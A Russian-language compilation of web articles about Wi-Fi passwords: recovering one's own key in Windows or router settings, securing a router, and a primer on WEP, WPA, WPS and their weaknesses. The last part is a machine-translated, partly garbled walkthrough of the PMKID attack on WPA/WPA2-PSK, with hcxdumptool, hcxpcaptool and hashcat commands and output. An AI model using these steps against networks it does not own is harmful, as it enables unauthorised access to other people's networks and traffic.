Пароль psk что это: Как узнать пароль от своей Wi-Fi сети?

Содержание

Как узнать пароль от своей Wi-Fi сети?

Всем привет, сегодня я бы хотел рассказать, что делать если вы забыли пароль от своей wi-fi сети. Тут нету ничего сложного и решить эту проблему можно за считанные минуты.

Все действия я буду показывать на Windows 10 и покажу вам 2 способа. Теперь приступим к делу!

1 Способ

Для восстановления, забытого вами пароль wi-fi, нам нужно лишь один подключенный компьютер к вашей сети. Жмем правой кнопкой мыши по значку «Доступ к Интернету» и выбираем пункт «Центр управления сетями и общим доступом».

В открывшимся окне жмем «Изменение параметров адаптера».

Появится еще одно окно, в котором правой кнопкой мыши нажимаем на наше соединение выбираем «Состояние».

Перед вами откроется окно Состояния беспроводной сети. Там вы сможете увидеть подробную информацию вашей сети wi-fi. Теперь жмем «Свойства беспроводной сети».

В открывшимся новом окошке переходим во вкладку «Безопасность» и ставим галочку возле слов «Отображать вводимые знаки». После этого в поле «Ключ безопасности сети» вы сможете увидеть забытый вами пароль. И обязательно запишите его на листочке чтобы опять не забыть. 🙂

После того как все сделали, можете закрыть все окна, которые вы открыли.


 

2 Способ

Если первый способ вам не помог, то вам сюда;)

Для начала убедитесь, что роутер подключен кабелем к компьютеру. После этого вам нужно будет зайти в личный кабинет вашего модема. Для этого нужно узнать IP адрес вашего модема. Его обычно можно найти на дне вашего роутера.

Вводим IP адрес в адресную строку браузера и появляется окно авторизации. Логин и пароль у всех стандартные «admin».

После чего мы попадаем в личный кабинет вашего роутера. (У вас он может выглядеть по-другому). В левом меню жмем на «Беспроводной режим» и в подменю выбираем «Защита беспроводного режима». По умолчанию защита должна стоять WPA-PSK/WPA2-PSK. В поле «Пароль PSK» должен быть написан ваш пароль, который вы можете изменить на какой-нить другой.

И, как всегда вы можете посмотреть видеоролик «Как узнать забытый пароль от wi-fi сети».

Если статья или видеоролик был вам полезен, то оставьте комментарий под этой статьей.

Поделится в соц. сетях:

что это и как его узнать?

Если Wi-Fi сеть защищена, то при подключении к ней устройство попросит нас ввести ключ безопасности сети. Почему-то у многих на этом этапе подключения возникают проблемы и следующие вопросы: что за ключ безопасности сети, где взять этот ключ, как узнать и т. д. На самом деле, все очень просто. У каждой Wi-Fi сети (роутера, точки доступа) есть хозяин. Человек, который установил роутер и настроил его. Так вот, в процессе настройки Wi-Fi сети на роутере устанавливается этот самый ключ безопасности сети, или просто пароль (это одно и то же), который защищает беспроводную сеть. Чтобы к ней могли подключаться только те, кто знает этот ключ.

Если запрос ключа безопасности появляется при подключении к нашей домашней Wi-Fi сети, то мы должны знать пароль, который установили в настройках роутера. Вводим пароль, и если он совпадает – устройство подключается к Wi-Fi. Да, возможно ключ мы забыли, или потеряли. Если у вас именно этот случай, то дальше я расскажу, как узнать ключ безопасности сети Wi-Fi. Если же сеть чужая, то вряд ли нам удастся подключиться к ней. Разве что спросить ключ у хозяина сети. В случае с общественными Wi-Fi сетями (в кафе, магазинах, торговых центрах) и т. д., пароль можно узнать у администрации заведения. Если сеть защищена, конечно.

О защите Wi-Fi сетей и ключах безопасности

В настройках каждого маршрутизатора можно выбрать алгоритм защиты Wi-Fi сети (WEP, WPA, WPA2) и шифрование (TKIP, AES). Самый надежный и популярный на данный момент алгоритм WPA2. Рекомендую использовать его. При установке этого алгоритма, необходимо задать ключ безопасности. Он должен состоять минимум из 8-ми символов. Об этом я рассказывал в статье: тип безопасности и шифрования беспроводной сети. Какой выбрать?

Рекомендую устанавливать надежный ключ безопасности, и использовать самый современный тип безопасности и шифрования. Сейчас это WPA2 — Personal с шифрованием AES. Эти настройки в паре с хорошим паролем будут надежно защищать вашу беспроводную сеть от подключения чужих устройств. На эту тему я уже писал отдельную статью: максимальная защита Wi-Fi сети и роутера от других пользователей и взлома.

Как установить ключ безопасности в настройках роутера (на примере роутеров разных производителей) я показывал в статье: как защитить сеть Wi-Fi паролем.

Выводы:

ключ безопасности Wi-Fi сети – это пароль, набор символов (например: fw2rLe5tG), который устанавливается в настройках роутера и служит для защиты Wi-Fi сети. Подключение к защищенной беспроводной сети возможно только после указания ключа безопасности на устройстве. Запрос появляется после выбора необходимой сети из списка доступных.

Как узнать ключ безопасности сети Wi-Fi?

Если мы забыли ключ безопасности сети, то его нужно как-то вспомнить, восстановить, или заменить на другой. Сделать это можно разными способами, о которых я расскажу дальше в статье. Если вы забыли, или потеряли ключ от своего Wi-Fi, то первым делом рекомендую обратится к тому, кто настраивал роутер и устанавливал пароль (если это были не вы, конечно). Возможно, в процессе настройки роутера ключ был где-то записан. Может даже на самом роутере. Если роутер устанавливал мастер от интернет-провайдера, то возможно он записал ключ в документах, которые оставил вам после завершения работы. Только не путайте пароль от Wi-Fi с паролем для подключения к интернет-провайдеру.

Еще один момент: практически на всех роутерах установлен ключ беспроводной сети по умолчанию, который защищает Wi-Fi сеть, когда роутер на заводских настройках. До той поры, пока он не будет изменен. Так вот, если вы не меняли заводской ключ, или сделали сброс настроек роутера, то для подключения к беспроводной сети нужно использовать заводской ключ безопасности. Он обычно написан на наклейке снизу роутера. Может быть подписан по-разному: Wi-Fi пароль, ключ сети, Wireless Key, Wi-Fi Key, PIN.

Я покажу три способа, которыми можно восстановить ключ безопасности Wi-Fi сети:

  1. Посмотреть ключ безопасности в свойствах нужной нам Wi-Fi сети в настройках Windows. Когда у нас есть компьютер, который на данный момент подключен, или был подключен к беспроводной сети, ключ от которой мы забыли. Так же узнать ключ от нужной сети можно с помощью программы WirelessKeyView.
  2. Посмотреть ключ Wi-Fi в настройках маршрутизатора.

Можно так же посмотреть пароль на Android-устройстве (если оно подключалось к этой сети), но там нужны ROOT права. Вряд ли кто-то будет этим заниматься. Если что, в интернете есть отдельные инструкции.

Смотрим ключ безопасности сети в Windows 10

Стандартная ситуация: к беспроводной сети был подключен ноутбук, несколько других устройств, после чего ключ был успешно забыт. Новое устройство уже никак не подключить.

Мы сможем посмотреть ключ сети описанным ниже способом только в том случае, если компьютер на данный момент подключен к этой сети. Если он раньше подключался к этой сети, но сейчас не подключен, и у вас Windows 10, то используйте программу WirelessKeyView.

Если у вас Windows 7, то смотрите инструкцию в этой статье: как узнать свой пароль от Wi-Fi, или что делать, если забыли пароль?

В Windows 10 открываем «Параметры сети и Интернет».

Переходим в «Центр управления сетями и общим доступом».

Нажимаем на сеть, к которой на данный момент подключен наш компьютер.

В открывшемся окне необходимо нажать на кнопку «Свойства беспроводной сети». В новом окне перейти на вкладку «Безопасность» и поставить галочку возле «Отображать вводимые знаки». В поле «Ключ безопасности сети» появится наш ключ (пароль от Wi-Fi).

Если этот способ не сработал, но вы уверены, что ваш компьютер подключался к этой беспроводной сети (Windows запомнила ключ), то можно попробовать посмотреть все сохраненные сети и пароли к ним с помощью программы WirelessKeyView. Она работает в Windows 10, Windows 8, Windows 7 и даже в Windows XP.

Нужно скачать программу с официального сайта http://www.nirsoft.net/utils/wireless_key.html (ссылка на загрузку внизу страницы), открыть архив и запустить файл WirelessKeyView.exe.

После запуска программы находим свою сеть (по имени) и смотрим пароль в полей «Key (Ascii)».

Так как программа скорее всего будет лезть в какие-то системные файлы, то антивирус может на нее ругаться (мой молчал). Можно отключить антивирус на время, если это необходимо.

Как посмотреть ключ от Wi-Fi в настройках роутера?

Ключ безопасности сети можно посмотреть в настройках роутера. Более того, при необходимости его можно сменить на новый. Это более универсальное решение, так как зайти в настройки роутера можно практически с любого устройства. В том числе подключившись к роутеру по сетевому кабелю. Если по Wi-Fi уже не подключиться, так как забыли ключ безопасности и нам нужно его как-то узнать.

Если у вас есть доступ к настройкам роутера – считайте, что проблема решена.

Самое главное – зайти в настройки роутера. Смотрите эту инструкцию: как зайти в настройки роутера. Если не получается зайти – напишите модель своего роутера в комментариях и опишите проблему (что именно не получается и на каком этапе). Постараюсь подсказать решение.

Дальше в веб-интерфейсе роутера нужно найти раздел с настройками безопасности беспроводной Wi-Fi сети. Если рассматривать на примере роутера TP-Link (со старым веб-интерфейсом), то посмотреть/сменить ключ безопасности сети можно в разделе «Беспроводной режим» – «Защита беспроводного режима». Ключ указан в поле «Пароль беспроводной сети».

Сохраните пароль (запишите куда-то). А если необходимо – смените его и сохраните настройки. Только после этого нужно будет заново подключить все устройства к беспроводной сети.

Эти статьи помогут вам найти и посмотреть, или сменить ключ Wi-Fi сети на своем роутере (инструкции для разных производителей):

Если остались какие-то вопросы, то задавайте их в комментариях. Будем вместе вспоминать ключ безопасности от вашей Wi-Fi сети 🙂

Настройка безопасности Wi-Fi маршрутизаторов и точек доступа — Технический блог

Сегодня у многих есть дома Wi-Fi маршрутизатор. Ведь по безпроводке куда проще подключить к интернету и ноутбук, и планшет, и смартфон, коих развелось в каждой семье больше чем людей. И он (маршрутизатор) по сути — врата в информационную вселенную. Читай входная дверь. И от этой двери зависит зайдет ли к вам незваный гость без вашего разрешения. Поэтому очень важно уделить внимание правильной настройке роутера, чтобы ваша беспроводная сеть не была уязвимой.

Думаю не нужно напоминать, что скрытие SSID точки доступа не защищает Вас. Ограничение доступа по MAC адресу не эффективно. Поэтому только современные методы шифрования и сложный пароль.

Зачем шифровать? Кому я нужен? Мне нечего скрывать

Не так страшно если украдут пин-код с кредитной карты и снимут с нее все деньги. Тем более, если кто-то будет сидеть за ваш счет в интернете, зная Wi-Fi пароль. И не так страшно если опубликуют ваши фото с корпоративных вечеринок где вы в неприглядном виде. Куда обидней когда злоумышленники проникнут в ваш компьютер и удалят фотографии как Вы забирали сына из роддома, как он сделал первые шаги и пошел в первый класс. Про бэкапы отдельная тема, их конечно нужно делать… Но репутацию со временем можно восстановить, деньги заработать, а вот дорогие для вас фотографии уже нет. Думаю у каждого есть то, что он не хочет потерять.
Ваш роутер является пограничным устройством между личным и публичным, поэтому настройте его защиту по полной. Тем более это не так сложно.

Технологии и алгоритмы шифрования

Опускаю теорию. Не важно как это работает, главное уметь этим пользоваться.
Технологии защиты беспроводных сетей развивались в следующем хронологическом порядке: WEP, WPA, WPA2. Также эволюционировали и методы шифрования RC4, TKIP, AES.
Лучшей с точки зрения безопасности на сегодняшний день является связка WPA2-AES. Именно так и нужно стараться настраивать Wi-Fi. Выглядеть это должно примерно так:

WPA2 является обязательным с 16 марта 2006 года. Но иногда еще можно встретить оборудование его не поддерживающее. В частности если у Вас на компьютере установлена Windows XP без 3-го сервис пака, то WPA2 работать не будет. Поэтому из соображений совместимости на маршрутизаторах можно встретить варианты настроек WPA2-PSK -> AES+TKIP и другой зверинец.
Но если парк девайсов у Вас современный, то лучше использовать WPA2 (WPA2-PSK) -> AES, как самый защищенный вариант на сегодняшний день.

Чем отличаются WPA(WPA2) и WPA-PSK(WPA2-PSK)

Стандартом WPA предусмотрен Расширяемый протокол аутентификации (EAP) как основа для механизма аутентификации пользователей. Непременным условием аутентификации является предъявление пользователем свидетельства (иначе называют мандатом), подтверждающего его право на доступ в сеть. Для этого права пользователь проходит проверку по специальной базе зарегистрированных пользователей. Без аутентификации работа в сети для пользователя будет запрещена. База зарегистрированных пользователей и система проверки в больших сетях как правило расположены на специальном сервере (чаще всего RADIUS).
Упрощённый режим Pre-Shared Key (WPA-PSK, WPA2-PSK) позволяет использовать один пароль, который хранится непосредственно в маршрутизаторе. С одной стороны все упрощается, нет необходимости создавать и сопровождать базу пользователей, с другой стороны все заходят под одним паролем.
В домашних условиях целесообразней использовать WPA2-PSK, то есть упрощенный режим стандарта WPA. Безопасность Wi-Fi от такого упрощения не страдает.

Пароль доступа Wi-Fi

Тут все просто. Пароль к вашей беспроводной точке доступа (роутеру) должен быть более 8 символов и содержать буквы в разном регистре, цифры, знаки препинания. И он никаким боком не должен ассоциироваться с вами. А это значит, что в качестве пароля нельзя использовать даты рождения, ваши имена, номера машин, телефонов и т.п.
Так как сломать в лоб WPA2-AES практически невозможно (была лишь пара случаев смоделированных в лабораторных условиях), то основными методами взлома WPA2 являются атака по словарю и брут-форс (последовательный перебор всех вариантов паролей). Поэтому чем сложней пароль, тем меньше шансов у злоумышленников.

… в СССР на железнодорожных вокзалах получили широкое распространение автоматические камеры хранения. В качестве кодовой комбинации замка использовались одна буква и три цифры. Однако мало кто знает, что первая версия ячеек камеры хранения использовала в качестве кодовой комбинации 4 цифры. Казалось бы какая разница? Ведь количество кодовых комбинаций одинаково — 10000 (десять тысяч). Но как показала практика (особенно Московского Уголовного Розыска), когда человеку предлагалось в качестве пароля к ячейке камеры хранения использовать комбинацию из 4-х цифр, то очень много людей использовало свой год рождения (чтобы не забыть). Чем небезуспешно пользовались злоумышленники. Ведь первые две цифры в дате рождения абсолютного большинства населения страны были известны — 19. Осталось на глазок определить примерный возраст сдающего багаж, а любой из нас это может сделать с точностью +/- 3 года, и в остатке мы получаем (точнее злоумышленники) менее 10 комбинаций для подбора кода доступа к ячейке автоматической камеры хранения…

Самый популярный пароль

Человеческая лень и безответственность берут свое. Вот список самых популярных паролей:

  1. 123456
  2. qwerty
  3. 111111
  4. 123123
  5. 1a2b3c
  6. Дата рождения
  7. Номер мобильного телефона
  8. Имя

Правила безопасности при составлении пароля

  1. Каждому свое. То есть пароль маршрутизатора не должен совпадать с любым другим Вашим паролем. От почты например. Возьмите себе за правило, у всех аккаунтов свои пароли и они все разные.
  2. Используйте стойкие пароли, которые нельзя угадать. Например: 2Rk7-kw8Q11vlOp0

У Wi-Fi пароля есть один огромный плюс. Его не надо запоминать. Его можно написать на бумажке и приклеить на дно маршрутизатора.

Гостевая зона Wi-Fi

Если ваш роутер позволяет организовать гостевую зону. То обязательно сделайте это. Естественно защитив ее WPA2 и надежным паролем. И теперь, когда к вам домой придут друзья и попросятся в интернет, вам не придется сообщать им основной пароль. Более того гостевая зона в маршрутизаторах изолирована от основной сети. И любые проблемы с девайсами ваших гостей не повлияют на вашу домашнюю сеть.

проникновение и защита. 1) Матчасть / Хабр

Синоптики предсказывают, что к 2016 году наступит второй ледниковый период трафик в беспроводных сетях на 10% превзойдёт трафик в проводном Ethernet. При этом от года в год частных точек доступа становится примерно на 20% больше.

При таком тренде не может не радовать то, что 80% владельцев сетей не меняют пароли доступа по умолчанию. В их число входят и сети компаний.

Этим циклом статей я хочу собрать воедино описания существующих технологии защит, их проблемы и способы обхода, таким образом, что в конце читатель сам сможет сказать, как сделать свою сеть непробиваемой, и даже наглядно продемонстрировать проблемы на примере незадачливого соседа (do not try this at home, kids). Практическая сторона взлома будет освещена с помощью Kali Linux (бывший Backtrack 5) в следующих частях.

Статья по мере написания выросла с 5 страниц до 40, поэтому я решил разбить её на части. Этот цикл — не просто инструкция, как нужно и не нужно делать, а подробное объяснение причин для этого. Ну, а кто хочет инструкций — они такие:

Используйте WPA2-PSK-CCMP с паролем от 12 символов a-z (2000+ лет перебора на ATI-кластере). Измените имя сети по умолчанию на нечто уникальное (защита от rainbow-таблиц). Отключите WPS (достаточно перебрать 10000 комбинаций PIN). Не полагайтесь на MAC-фильтрацию и скрытие SSID.

Оглавление:
1) Матчасть
2) Kali. Скрытие SSID. MAC-фильтрация. WPS
3) WPA. OpenCL/CUDA. Статистика подбора

Но сначала — матчасть.
Передайте мне сахар

Представьте, что вы — устройство, которое принимает инструкции. К вам может подключиться каждый желающий и отдать любую команду. Всё хорошо, но на каком-то этапе потребовалось фильтровать личностей, которые могут вами управлять. Вот здесь и начинается самое интересное.

Как понять, кто может отдать команду, а кто нет? Первое, что приходит в голову — по паролю. Пусть каждый клиент перед тем, как передать новую команду, передаст некий пароль. Таким образом, вы будете выполнять только команды, которые сопровождались корректным паролем. Остальные — фтопку.


Именно так работает базовая авторизация HTTP (Auth Basic):
AuthType Basic
AuthName "My super secret zone!"
AuthUserFile /home/.htpasswd
Require valid-user 

После успешной авторизации браузер просто-напросто будет передавать определённый заголовок при каждом запросе в закрытую зону:

Authorization: Basic YWRtaW46cGFzcw==

То есть исходное:
echo -n 'admin:pass' | base64
# YWRtaW46cGFzcw==

У данного подхода есть один большой недостаток — так как пароль (или логин-пароль, что по сути просто две части того же пароля) передаётся по каналу «как есть» — кто угодно может встрять между вами и клиентом и получить ваш пароль на блюдечке. А затем использовать его и распоряжаться вами, как угодно!

Для предотвращения подобного безобразия можно прибегнуть к хитрости: использовать какой-либо двухсторонний алгоритм шифрования, где закрытым ключом будет как раз наш пароль, и явно его никогда не передавать. Однако проблемы это не решит — достаточно один раз узнать пароль и можно будет расшифровать любые данные, переданные в прошлом и будущем, плюс шифровать собственные и успешно маскироваться под клиента. А учитывая то, что пароль предназначен для человека, а люди склонны использовать далеко не весь набор из 256 байт в каждом символе, да и символов этих обычно около 6-8… в общем, комсомол не одобрит.

Что делать? А поступим так, как поступают настоящие конспираторы: при первом контакте придумаем длинную случайную строку (достаточно длинную, чтобы её нельзя было подобрать, пока светит это солнце), запомним её и все дальнейшие передаваемые данные будем шифровать с использованием этого «псевдонима» для настоящего пароля. А ещё периодически менять эту строку — тогда джедаи вообще не пройдут.


Первые две передачи (зелёные иконки на рисунке выше) — это фаза с «пожатием рук» (handshake), когда сначала мы говорим серверу о нашей легитимности, показывая правильный пароль, на что сервер нам отвечает случайной строкой, которую мы затем используем для шифрования и передачи любых данных.

Итак, для подбора ключа хакеру нужно будет либо найти уязвимость в алгоритме его генерации (как в случае с Dual_EC_DRBG), либо арендовать сотню-другую параллельных вселенных и несколько тысяч ATI-ферм для решения этой задачи при своей жизни. Всё это благодаря тому, что случайный ключ может быть любой длины и содержать любые коды из доступных 256, потому что пользователю-человеку никогда не придётся с ним работать.

Именно такая схема с временным ключом (сеансовый ключ, session key или ticket) в разных вариациях и используется сегодня во многих системах — в том числе SSL/TLS и стандартах защиты беспроводных сетей, о которых будет идти речь.

План атаки

Внимательные читатели, конечно, заметили, что как бы мы не хитрили — от передачи пароля и временного ключа в открытой или хэшированной форме нам никуда не деться. Как результат — достаточно хакеру перехватить передачу на этой фазе, и он сможет читать все последующие данные, а также участвовать в процессе, вставляя свои пять копеек. И отличить его невозможно, так как вся информация, которой бы мог руководствоваться сервер для выдачи временного ключа или проверки доступа базируется именно на том, что было в начале передачи — handshake. Поэтому хакер знает всё то же, что и сервер, и клиент, и может водить обоих за нос, пока не истечёт срок действия временного ключа.

Наша задача при взломе любой передачи так или иначе сводится к перехвату рукопожатия, из которого можно будет либо вытащить временный ключ, либо исходный пароль, либо и то, и другое. В целом, это довольно долгое занятие и требует определённой удачи.

Но это в идеальном мире…

Механизмы защиты Wi-Fi

Технологии создаются людьми и почти во всех из них есть ошибки, иногда достаточно критические, чтобы обойти любую самую хорошую в теории защиту. Ниже мы пробежимся по списку существующих механизмов защиты передачи данных по радиоканалу (то есть не затрагивая SSL, VPN и другие более высокоуровневые способы).
OPEN

OPEN — это отсутствие всякой защиты. Точка доступа и клиент никак не маскируют передачу данных. Почти любой беспроводной адаптер в любом ноутбуке с Linux может быть установлен в режим прослушки, когда вместо отбрасывания пакетов, предназначенных не ему, он будет их фиксировать и передавать в ОС, где их можно спокойно просматривать. Кто у нас там полез в Твиттер?

Именно по такому принципу работают проводные сети — в них нет встроенной защиты и «врезавшись» в неё или просто подключившись к хабу/свичу сетевой адаптер будет получать пакеты всех находящихся в этом сегменте сети устройств в открытом виде. Однако с беспроводной сетью «врезаться» можно из любого места — 10-20-50 метров и больше, причём расстояние зависит не только от мощности вашего передатчика, но и от длины антенны хакера. Поэтому открытая передача данных по беспроводной сети гораздо более опасна.

В этом цикле статей такой тип сети не рассматривается, так как взламывать тут нечего. Если вам нужно пользоваться открытой сетью в кафе или аэропорту — используйте VPN (избегая PPTP) и SSL (https://, но при этом поставьте HTTPS Everywhere, или параноидально следите, чтобы из адресной строки «внезапно» не исчез замок, если кто включит sslstrip — что, впрочем, переданных паролей уже не спасёт), и даже всё вместе. Тогда ваших котиков никто не увидит.

WEP

WEP — первый стандарт защиты Wi-Fi. Расшифровывается как Wired Equivalent Privacy («эквивалент защиты проводных сетей»), но на деле он даёт намного меньше защиты, чем эти самые проводные сети, так как имеет множество огрехов и взламывается множеством разных способов, что из-за расстояния, покрываемого передатчиком, делает данные более уязвимыми. Его нужно избегать почти так же, как и открытых сетей — безопасность он обеспечивает только на короткое время, спустя которое любую передачу можно полностью раскрыть вне зависимости от сложности пароля. Ситуация усугубляется тем, что пароли в WEP — это либо 40, либо 104 бита, что есть крайне короткая комбинация и подобрать её можно за секунды (это без учёта ошибок в самом шифровании).

WEP был придуман в конце 90-х, что его оправдывает, а вот тех, кто им до сих пор пользуется — нет. Я до сих пор на 10-20 WPA-сетей стабильно нахожу хотя бы одну WEP-сеть.

На практике существовало несколько алгоритмов шифровки передаваемых данных — Neesus, MD5, Apple — но все они так или иначе небезопасны. Особенно примечателен первый, эффективная длина которого — 21 бит (~5 символов).

Основная проблема WEP — в фундаментальной ошибке проектирования. Как было проиллюстрировано в начале — шифрование потока делается с помощью временного ключа. WEP фактически передаёт несколько байт этого самого ключа вместе с каждым пакетом данных. Таким образом, вне зависимости от сложности ключа раскрыть любую передачу можно просто имея достаточное число перехваченных пакетов (несколько десятков тысяч, что довольно мало для активно использующейся сети).

К слову, в 2004 IEEE объявили WEP устаревшим из-за того, что стандарт «не выполнил поставленные перед собой цели [обеспечения безопасности беспроводных сетей]».

Про атаки на WEP будет сказано в третьей части. Скорее всего в этом цикле про WEP не будет, так как статьи и так получились очень большие, а распространённость WEP стабильно снижается. Кому надо — легко может найти руководства на других ресурсах.

WPA и WPA2

WPA — второе поколение, пришедшее на смену WEP. Расшифровывается как Wi-Fi Protected Access. Качественно иной уровень защиты благодаря принятию во внимание ошибок WEP. Длина пароля — произвольная, от 8 до 63 байт, что сильно затрудняет его подбор (сравните с 3, 6 и 15 байтами в WEP).

Стандарт поддерживает различные алгоритмы шифрования передаваемых данных после рукопожатия: TKIP и CCMP. Первый — нечто вроде мостика между WEP и WPA, который был придуман на то время, пока IEEE были заняты созданием полноценного алгоритма CCMP. TKIP так же, как и WEP, страдает от некоторых типов атак, и в целом не безопасен. Сейчас используется редко (хотя почему вообще ещё применяется — мне не понятно) и в целом использование WPA с TKIP почти то же, что и использование простого WEP.

Одна из занятных особенностей TKIP — в возможности так называемой Michael-атаки. Для быстрого залатывания некоторых особо критичных дыр в WEP в TKIP было введено правило, что точка доступа обязана блокировать все коммуникации через себя (то есть «засыпать») на 60 секунд, если обнаруживается атака на подбор ключа (описана во второй части). Michael-атака — простая передача «испорченных» пакетов для полного отключения всей сети. Причём в отличии от обычного DDoS тут достаточно всего двух (двух) пакетов для гарантированного выведения сети из строя на одну минуту.


WPA отличается от WEP и тем, что шифрует данные каждого клиента по отдельности. После рукопожатия генерируется временный ключ — PTK — который используется для кодирования передачи этого клиента, но никакого другого. Поэтому даже если вы проникли в сеть, то прочитать пакеты других клиентов вы сможете только, когда перехватите их рукопожатия — каждого по отдельности. Демонстрация этого с помощью Wireshark будет в третьей части.

Кроме разных алгоритмов шифрования, WPA(2) поддерживают два разных режима начальной аутентификации (проверки пароля для доступа клиента к сети) — PSK и Enterprise. PSK (иногда его называют WPA Personal) — вход по единому паролю, который вводит клиент при подключении. Это просто и удобно, но в случае больших компаний может быть проблемой — допустим, у вас ушёл сотрудник и чтобы он не мог больше получить доступ к сети приходится применять способ из «Людей в чёрном» менять пароль для всей сети и уведомлять об этом других сотрудников. Enterprise снимает эту проблему благодаря наличию множества ключей, хранящихся на отдельном сервере — RADIUS. Кроме того, Enterprise стандартизирует сам процесс аутентификации в протоколе EAP (Extensible Authentication Protocol), что позволяет написать собственный велосипед алгоритм. Короче, одни плюшки для больших дядей.

В этом цикле будет подробно разобрана атака на WPA(2)-PSK, так как Enterprise — это совсем другая история, так как используется только в больших компаниях.

WPS/QSS

WPS, он же Qikk aSS QSS — интересная технология, которая позволяет нам вообще не думать о пароле, а просто добавить воды нажать на кнопку и тут же подключиться к сети. По сути это «легальный» метод обхода защиты по паролю вообще, но удивительно то, что он получил широкое распространение при очень серьёзном просчёте в самой системе допуска — это спустя годы после печального опыта с WEP.

WPS позволяет клиенту подключиться к точке доступа по 8-символьному коду, состоящему из цифр (PIN). Однако из-за ошибки в стандарте нужно угадать лишь 4 из них. Таким образом, достаточно всего-навсего 10000 попыток подбора и вне зависимости от сложности пароля для доступа к беспроводной сети вы автоматически получаете этот доступ, а с ним в придачу — и этот самый пароль как он есть.

Учитывая, что это взаимодействие происходит до любых проверок безопасности, в секунду можно отправлять по 10-50 запросов на вход через WPS, и через 3-15 часов (иногда больше, иногда меньше) вы получите ключи от рая.

Когда данная уязвимость была раскрыта производители стали внедрять ограничение на число попыток входа (rate limit), после превышения которого точка доступа автоматически на какое-то время отключает WPS — однако до сих пор таких устройств не больше половины от уже выпущенных без этой защиты. Даже больше — временное отключение кардинально ничего не меняет, так как при одной попытке входа в минуту нам понадобится всего 10000/60/24 = 6,94 дней. А PIN обычно отыскивается раньше, чем проходится весь цикл.

Хочу ещё раз обратить ваше внимание, что при включенном WPS ваш пароль будет неминуемо раскрыт вне зависимости от своей сложности. Поэтому если вам вообще нужен WPS — включайте его только когда производится подключение к сети, а в остальное время держите этот бекдор выключенным.

Атака на WPS будет рассмотрена во второй части.

p.s: так как тема очень обширная, в материал могли закрасться ошибки и неточности. Вместо криков «автор ничего не понимает» лучше использовать комментарии и ЛС. Это будет только приветствоваться.

Оглавление:
1) Матчасть
2) Kali. Скрытие SSID. MAC-фильтрация. WPS
3) WPA. OpenCL/CUDA. Статистика подбора

Как взломать WPA / WPA2 PSK включен WiFi пароль в вашей сети

Новый метод атаки для WiFi хакер обнаружил взломать WiFi пароль, который защищен с WPA / WPA2 в сетях WiFi, которые позволяют злоумышленникам получить предварительно общий ключ хэш, который используется для взлома WiFi пароль, используемый целевыми жертвами.

WiFi Альянс недавно обновил протокол WiFi WPA3 и утверждал, что невозможно взломать, так как он развернут с протоколом шифрования высокого уровня. Но исследователь ошибается, эксплуатируя уязвимость и называя ее Dragonblood.

Этот новый метод хакера WiFi обнаружен во время атаки на недавно выпущенный стандарт безопасности WPA3, который чрезвычайно сложно взломать, поскольку он использовал одновременную аутентификацию Equals (SAE), новый протокол установления ключа.

Новый стандарт безопасности WP3, выпущенный Wi-Fi Alliance, который обеспечивает безопасность Wi-Fi следующего поколения с новыми возможностями для улучшения как личных, так и корпоративных сетей и новый стандарт безопасности WP3, который является преемником WPA2 .

Исследователь находит эту атаку для хакера WiFi, чтобы скомпрометировать пароль WPA/WPA2, не выполняя рукопожатие EAPOL 4.

По словам Steube , который является разработчиком инструмента взлома паролей Hashcat, новая атака выполняется на RSN IE (надежный элемент информации о сети безопасности) одного фрейма EAPOL.

Кроме того, эта атака работает против всех типов сетей 802.11 i/p/q/r с включенными функциями роуминга, и неясно, сколько поставщиков и сколько маршрутизаторов эта техника будет работать.

Как это WPA / WPA2 работает для хакера WiFi и процесса взлома WiFi
Надежный элемент информации о сети безопасности (RSN IE) является необязательным в кадрах управления 802.11 и работает в одном кадре EAPOL.

Pairwise master Key ID (PMKID) может быть захвачен из RSN IE всякий раз, когда пользователь пытается аутентифицироваться с маршрутизатором.

«Здесь мы видим, что PMKID был захвачен, вычисляется с помощью HMAC-SHA1, где ключом является PMK, а частью данных является конкатенация фиксированной Строковой метки “имя PMK”, MAC-адрес точки доступа и MAC-адрес станции.”

Для того, чтобы использовать эту новую атаку, как WiFi хакер, вам нужны следующие инструменты:

WiFi Хакер-Шаг 1
Сначала запустите hcxdumptool, чтобы получить PMKID из AP и выгрузить файл в формате PCAP, используя следующий код.

Вывод выглядит так:

Код:

начать захват (остановка с помощью Ctrl+с)
интерфейс:...............: wlp39s0f3u4u5
фильтры...............: 0 записи
клиент для Mac...............: 89acf0e761f4 (клиент)
для Mac точки доступа.........: 4604ba734d4e (пуск сетевой карты)
EAPOL с тайм-аут............: 20000
DEAUTHENTICATIONINTERVALL: 10 маяков
сдаваться DEAUTHENTICATIONS: 20 попыток
REPLAYCOUNTER............: 62083
ANONCE...................: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69
WiFi Хакер-Шаг 2
Запустите следующий инструмент под названием hcxpcaptool, чтобы преобразовать захваченные данные из формата pcapng в хэш-формат, принятый hashcat, используя следующий код.

Код:

$ ./ hcxpcaptool-Z тест.16800 тест.pcapng
Содержимое записанного файла будет выглядеть следующим образом и разделится на 4 столбца.

PMKID * MAC AP * MAC Station * ESSID

Код:

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a
Также исследователь рекомендует для WiFi хакера, что хотя и не требуется, рекомендуется использовать опции-E-I и-U с hcxpcaptool . Мы можем использовать эти файлы для подачи hashcat . Они обычно дают хорошие результаты.

  • — E получить возможные пароли от WiFi-трафика (дополнительно, этот список будет включать ESSIDs)
  • — Я получаю идентификационные данные из WiFi-трафика
  • — U получить имена пользователей из WiFi-трафика

Код:

$ ./ hcxpcaptool-e essidlist-I identitylist-U usernamelist-Z тест.16800 тест.pcapng
Шаг 3
Наконец, запустите hashcat, чтобы взломать его, нам нужно использовать хэш-режим PMKID -16800, и мы можем использовать этот хэш как любой другой тип хэша, используя следующий код,

Код:

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’
Наконец, он взломал хэш WPA-PMKID-PBKDF2

Код:

hashcat (v4.2.0) начало…

В OpenCL платформы #1: компания NVIDIA
======================================
* устройство #1: GeForce для видеокарты GTX 1080, 2028/8112 МБ приписаны, 20MCU
* устройство #2: GeForce для видеокарты GTX 1080, 2029/8119 МБ приписаны, 20MCU
* устройство #3: видеокарты GeForce видеокарты GTX 1080, 2029/8119 МБ приписаны, 20MCU
* устройство #4: GeForce для видеокарты GTX 1080, приписываемых 2029/8119 МБ, 20MCU

Хэши: 1 дайджест; 1 уникальный дайджест, 1 уникальная соль
